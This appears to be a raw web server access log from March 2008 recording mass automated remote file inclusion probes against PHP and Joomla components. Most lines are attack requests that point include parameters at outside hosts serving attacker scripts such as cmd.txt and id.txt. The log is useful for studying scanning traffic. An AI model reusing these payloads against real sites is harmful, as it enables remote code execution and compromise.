61.250.95.201 - - [04/Mar/2008:08:35:36 -0800] "GET /logs/access_080124.log//inc/cmses/aedating4CMS.php?bbPath[path]=http://servicesbrazil.net/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.210.111.98 - - [04/Mar/2008:08:36:01 -0800] "GET /logs/access.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.111.98 - - [04/Mar/2008:08:36:01 -0800] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.111.98 - - [04/Mar/2008:08:36:01 -0800] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:08:36:07 -0800] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:08:36:08 -0800] "GET /logs/access.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:08:36:08 -0800] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:08:36:08 -0800] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:08:36:10 -0800] "GET /logs/access.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:08:36:11 -0800] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:08:36:11 -0800] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:08:36:11 -0800] "GET /logs/access.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:08:36:11 -0800] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:08:36:11 -0800] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:08:36:12 -0800] "GET /logs/access.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:08:36:12 -0800] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:08:36:12 -0800] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:08:36:14 -0800] "GET /logs/access.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:08:36:14 -0800] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:08:36:14 -0800] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.23.153.242 - - [04/Mar/2008:08:36:30 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://geocities.com/wisnu_amanda/wisnu.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.153.242 - - [04/Mar/2008:08:36:31 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://geocities.com/wisnu_amanda/wisnu.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.196.84 - - [04/Mar/2008:08:36:39 -0800] "GET /logs/access_080101.log/main.php?pageURL=http://buckleymanagement.com/images/img? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.196.84 - - [04/Mar/2008:08:36:40 -0800] "GET /logs/main.php?pageURL=http://buckleymanagement.com/images/img? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.196.84 - - [04/Mar/2008:08:36:40 -0800] "GET /logs/access_080122.log/main.php?pageURL=http://buckleymanagement.com/images/img? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [04/Mar/2008:08:37:03 -0800] "GET /logs/access_080122.log//modules/vwar/admin/admin.php?vwar_root=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.108 - - [04/Mar/2008:08:37:53 -0800] "GET /logs/access.log/?vsdragonrootpath=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.108 - - [04/Mar/2008:08:37:54 -0800] "GET /?vsdragonrootpath=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 200 3094 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.108 - - [04/Mar/2008:08:37:54 -0800] "GET /logs/?vsdragonrootpath=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 200 37260 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.8.117 - - [04/Mar/2008:08:38:07 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.117 - - [04/Mar/2008:08:38:07 -0800] "GET /minamijewelry/?D=A HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:08:38:17 -0800] "GET /logs/access_080119.log//account.php?action=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:08:38:22 -0800] "GET //account.php?action=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:08:38:28 -0800] "GET /logs//account.php?action=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.246.218.239 - - [04/Mar/2008:08:38:29 -0800] "GET /config.php?path_to_root=http://angel.yum.pl/joomla/images/borda10.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.69.192.133 - - [04/Mar/2008:08:38:35 -0800] "GET /logs/access_071219.log///order/login.php?svr_rootscript=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.192.133 - - [04/Mar/2008:08:38:35 -0800] "GET ///order/login.php?svr_rootscript=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.192.133 - - [04/Mar/2008:08:38:35 -0800] "GET /logs///order/login.php?svr_rootscript=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.192.133 - - [04/Mar/2008:08:38:36 -0800] "GET /logs/access_071216.log///order/login.php?svr_rootscript=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.24.212 - - [04/Mar/2008:08:38:51 -0800] "GET /?N=D HTTP/1.0" 200 3078 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.210.111.98 - - [04/Mar/2008:08:40:23 -0800] "GET /logs/access_080126.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:08:40:24 -0800] "GET /logs/access_080126.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:08:40:27 -0800] "GET /logs/access_080126.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:08:40:39 -0800] "GET /logs/access_080126.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:08:40:43 -0800] "GET /logs/access_080126.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:08:40:43 -0800] "GET /logs/access_080126.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:08:40:45 -0800] "GET /logs/access_080211.log//account.php?action=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:08:41:13 -0800] "GET /logs/access_080119.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.jonesmkt.com/shop/images/gt_interactive/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:08:41:28 -0800] "GET /logs/access_080119.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.jonesmkt.com/shop/images/gt_interactive/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
24.74.142.67 - - [04/Mar/2008:08:41:40 -0800] "GET /presto/ HTTP/1.1" 200 526 "http://home.earthlink.net/~infernofilecabinet2/XpSetupsF_J/JourneyPII_Setup.htm" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
89.111.176.108 - - [04/Mar/2008:08:41:50 -0800] "GET /logs/access_080130.log/?vsdragonrootpath=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.74.142.67 - - [04/Mar/2008:08:41:57 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
201.155.86.251 - - [04/Mar/2008:08:42:15 -0800] "GET /logs/access_080207.log//include.php?path[docroot]=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.74.142.67 - - [04/Mar/2008:08:42:28 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
24.74.142.67 - - [04/Mar/2008:08:42:31 -0800] "GET / HTTP/1.1" 200 3094 "http://www.dmulk.com/presto/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
220.80.107.11 - - [04/Mar/2008:08:42:44 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
220.80.107.11 - - [04/Mar/2008:08:42:44 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:08:42:56 -0800] "GET /signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:08:43:00 -0800] "GET /logs/access_080131.log//index.php?body=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.183.138 - - [04/Mar/2008:08:43:09 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://yugifire.t35.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.23.156 - - [04/Mar/2008:08:43:59 -0800] "GET /minamijewelry/moon.psd HTTP/1.0" 200 108656 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.193.225.91 - - [04/Mar/2008:08:44:03 -0800] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ecology.275mb.com/hack/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.225.91 - - [04/Mar/2008:08:44:03 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ecology.275mb.com/hack/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.225.91 - - [04/Mar/2008:08:44:04 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ecology.275mb.com/hack/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.67.21.65 - - [04/Mar/2008:08:44:22 -0800] "GET /logs/access_080201.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.21.65 - - [04/Mar/2008:08:44:22 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.21.65 - - [04/Mar/2008:08:44:23 -0800] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.79.75.195 - - [04/Mar/2008:08:44:34 -0800] "GET /LooK.php?cible=http://www.syshd.de/cache/%20%20%20%20%20%20%20/isis.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
194.79.75.195 - - [04/Mar/2008:08:44:34 -0800] "GET /logs/LooK.php?cible=http://www.syshd.de/cache/%20%20%20%20%20%20%20/isis.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
207.210.111.98 - - [04/Mar/2008:08:45:43 -0800] "GET /logs/access_080126.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.111.98 - - [04/Mar/2008:08:45:43 -0800] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.111.98 - - [04/Mar/2008:08:45:43 -0800] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.86.119 - - [04/Mar/2008:08:45:44 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.44.108 - - [04/Mar/2008:08:45:59 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.172.35.235 - - [04/Mar/2008:08:46:35 -0800] "GET /appserv/main.php?appserv_root=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:08:46:43 -0800] "GET /logs/access_080126.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:08:46:43 -0800] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:08:46:43 -0800] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.227.60.6 - - [04/Mar/2008:08:46:45 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rafb.net/p/imSXet81.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
212.227.60.6 - - [04/Mar/2008:08:46:46 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rafb.net/p/imSXet81.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
212.227.60.6 - - [04/Mar/2008:08:46:46 -0800] "GET /logs/access_080201.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rafb.net/p/imSXet81.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
221.6.101.22 - - [04/Mar/2008:08:46:56 -0800] "GET /logs/access_080131.log/index.php?body=http://treguonline.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.227.60.6 - - [04/Mar/2008:08:47:17 -0800] "GET /logs/access_080117.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rafb.net/p/imSXet81.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
189.19.5.161 - - [04/Mar/2008:08:48:17 -0800] "GET /logs/access_071216.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.19.5.161 - - [04/Mar/2008:08:48:25 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.19.5.161 - - [04/Mar/2008:08:48:26 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
221.6.101.22 - - [04/Mar/2008:08:48:33 -0800] "GET /logs/access_080207.log//include.php?path[docroot]=http://treguonline.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.19.5.161 - - [04/Mar/2008:08:48:43 -0800] "GET /logs/access_071228.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.86.80.16 - - [04/Mar/2008:08:48:50 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.23.153.242 - - [04/Mar/2008:08:48:58 -0800] "GET /logs/access_080119.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://geocities.com/wisnu_amanda/wisnu.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.44.93 - - [04/Mar/2008:08:49:46 -0800] "GET /logs/access_080122.log HTTP/1.0" 200 590794 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.216.97 - - [04/Mar/2008:08:50:10 -0800] "GET /logs/access_080201.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
71.70.134.227 - - [04/Mar/2008:08:50:16 -0800] "GET /logs/access_080131.log/index.php?body=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:08:51:15 -0800] "GET /signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:08:51:28 -0800] "GET /logs/access_080119.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://webmail.asl3.umbria.it/admin/inc/albania.txt????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.155.86.251 - - [04/Mar/2008:08:51:33 -0800] "GET /logs/access_080207.log//include.php?path[docroot]=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.225.91 - - [04/Mar/2008:08:52:11 -0800] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ecology.275mb.com/hack/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.80.107.11 - - [04/Mar/2008:08:53:29 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
220.80.107.11 - - [04/Mar/2008:08:53:29 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
74.86.80.16 - - [04/Mar/2008:08:53:58 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.204.234 - - [04/Mar/2008:08:54:25 -0800] "GET /logs//login.php?dir=http://www.angelfire.com/linux/ryu1/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
217.195.204.234 - - [04/Mar/2008:08:54:25 -0800] "GET //login.php?dir=http://www.angelfire.com/linux/ryu1/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
217.195.204.234 - - [04/Mar/2008:08:54:26 -0800] "GET /logs//login.php?dir=http://www.angelfire.com/linux/ryu1/b?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
217.195.204.234 - - [04/Mar/2008:08:54:26 -0800] "GET //login.php?dir=http://www.angelfire.com/linux/ryu1/b?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
217.195.204.234 - - [04/Mar/2008:08:54:27 -0800] "GET /logs//login.php?dir=http://www.angelfire.com/linux/ryu1/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
217.195.204.234 - - [04/Mar/2008:08:54:27 -0800] "GET //login.php?dir=http://www.angelfire.com/linux/ryu1/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
74.6.20.24 - - [04/Mar/2008:08:54:53 -0800] "GET /funny/ HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.86.80.16 - - [04/Mar/2008:08:54:54 -0800] "GET /start.php?id=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.191.48.162 - - [04/Mar/2008:08:55:44 -0800] "GET /logs//index.php?option=com_performs&formid=1&Itemid=156&mosConfig_absolute_path=http://www.computermonitoringmanagement.com/images/.bash/indexfile.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:08:55:58 -0800] "GET /logs/access_080211.log/signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:08:55:58 -0800] "GET /logs/signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
